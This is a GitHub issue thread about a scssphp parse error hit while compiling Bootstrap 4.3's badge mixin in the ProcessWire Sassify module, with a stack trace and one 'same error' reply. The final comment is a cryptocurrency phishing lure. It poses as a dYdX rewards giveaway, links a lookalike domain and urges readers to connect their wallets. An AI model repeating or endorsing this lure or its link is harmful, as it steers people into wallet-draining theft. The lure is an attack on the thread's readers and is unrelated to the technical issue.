### ISSUE TITLE
Bootstrap 4.3 Compile Error

### ISSUE THREAD

**Issue by csaeum** [lesaff/ProcessWire-Sassify#9]
Fatal error: Exception: parse error: failed at `&} {` /home/xx/site/templates/sass/mixins/_badge.scss on line 5 (in /home/xx/site/modules/Sassify/vendor/leafo/scssphp/src/Parser.php line 128) #0 /home/xx/site/modules/Sassify/vendor/leafo/scssphp/src/Parser.php(169): Leafo\ScssPhp\Parser->throwParseError() #1 /home/xx/site/modules/Sassify/vendor/leafo/scssphp/src/Compiler.php(3448): Leafo\ScssPhp\Parser->parse('@mixin badge-va...') #2 /home/xx/site/modules/Sassify/vendor/leafo/scssphp/src/Compiler.php(1530): Leafo\ScssPhp\Compiler->importFile('/home/frawanbd/...', Object(Leafo\ScssPhp\Formatter\OutputBlock)) #3 /home/xx/site/modules/Sassify/vendor/leafo/scssphp/src/Compiler.php(1592): Leafo\ScssPhp\Compiler->compileImport(Array, Object(Leafo\ScssPhp\Formatter\OutputBlock)) #4 /home/xx/site/modules/Sassify/vendor/leafo/scssphp/src/Compiler.php(1335): Leafo\S in /home/xx/index.php on line 64

Fehler: Exception: parse error: failed at `&} {` /home/xx/site/templates/sass/mixins/_badge.scss on line 5 (in /home/xx/site/modules/Sassify/vendor/leafo/scssphp/src/Parser.php line 128)

#0 /home/xx/site/modules/Sassify/vendor/leafo/scssphp/src/Parser.php(169): Leafo\ScssPhp\Parser->throwParseError()
#1 /home/xx/site/modules/Sassify/vendor/leafo/scssphp/src/Compiler.php(3448): Leafo\ScssPhp\Parser->parse('@mixin badge-va...')
#2 /home/xx/site/modules/Sassify/vendor/leafo/scssphp/src/Compiler.php(1530): Leafo\ScssPhp\Compiler->importFile('/home/frawanbd/...', Object(Leafo\ScssPhp\Formatter\OutputBlock))
#3 /home/xx/site/modules/Sassify/vendor/leafo/scssphp/src/Compiler.php(1592): Leafo\ScssPhp\Compiler->compileImport(Array, Object(Leafo\ScssPhp\Formatter\OutputBlock))
#4 /home/xx/site/modules/Sassify/vendor/leafo/scssphp/src/Compiler.php(1335): Leafo\S

Diese Fehlermeldung wurde angezeigt wegen: Site ist im Debug-Modus. ($config->debug = true; => /site/config.php). Fehler wurde protokolliert.

**Comment by eydun** [comment]
I get the same error

**Comment by muraliR** [comment]
## Congratulations! You've been chosen to receive a $7,000 Rewards. 🪂🔴 


### Trading and Launch Rewards are live on dYdX Chain! ✨

Connect your wallet, follow the instructions, and claim this exclusive offer from Dydx Exchange. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

[![Dydx Exchange](https://pbs.twimg.com/card_img/1729868185275617280/nzyJpc7G?format=jpg&name=small)](https://claim.dydxexchang.com/)


[![N|Solid](https://cldup.com/dTxpPi9lDf.thumb.png)](https://nodesource.com/products/nsolid)

🚀 **Claim Your Rewards Now!** [Check Eligibility](https://claim.dydxexchang.com/)

Access the Dydx Exchange platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Connect your wallet twice
- 📋 Register on the platform
- 💰 Claim your Rewards, up to $2,000!

@dydxprotocol
